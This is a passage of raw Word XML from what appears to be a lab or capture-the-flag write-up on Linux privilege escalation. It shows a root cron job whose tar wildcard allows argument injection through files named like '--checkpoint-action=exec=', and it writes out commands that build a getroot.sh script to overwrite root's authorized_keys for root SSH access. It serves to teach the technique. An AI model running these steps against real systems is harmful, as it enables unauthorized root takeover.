      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, they found a cron job using LinPeas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Initial Discovery: Vulnerable Cron Job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They discover a cron job that runs a script as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> every 5 minutes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CB">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5 * * * * root /usr/local/bin/backup-flask.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CC">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means every hour at minute 5 (e.g., 12:05, 1:05, etc.), </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup-flask.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They inspect the script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /usr/local/bin/backup-flask.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025CF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH="/home/alfredo/restapi:$PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /home/alfredo/restapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf /tmp/flask.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_su1jatidfn06" w:id="330"/>
      <w:bookmarkEnd w:id="330"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D5">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Observations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The script </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uses tar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to compress all files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in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/alfredo/restapi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is prepended with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/alfredo/restapi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so any command (like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could be overridden by a file with the same name in that directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="314"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It runs as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025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DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025DB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Vulnerability: Tar Wildcard Exploit (Bash Gobbling)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025DC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The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command is known to be vulnerable to a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wildcard injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025DD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Specifically, if a filename starts with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--checkpoint-action=exec=...</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--checkpoint=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> also exists,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will execute the script provided as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025DE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, the attacker prepares malicious files with those names to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inject arguments into tar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025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E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Creating a Malicious </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Script (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They want to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">copy their SSH public key into root's authorized_keys file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so they can SSH in as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd restapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '#!/bin/bash' &gt;&gt; getroot.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'cp /home/alfredo/.ssh/authorized_keys /root/.ssh/authorized_keys ' &gt;&gt; getroot.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This creates </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025E9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025EA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /home/alfredo/.ssh/authorized_keys /root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025EB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the root's authorized_keys with theirs, letting them SSH in as root.</w:t>
      </w:r>
    </w:p>
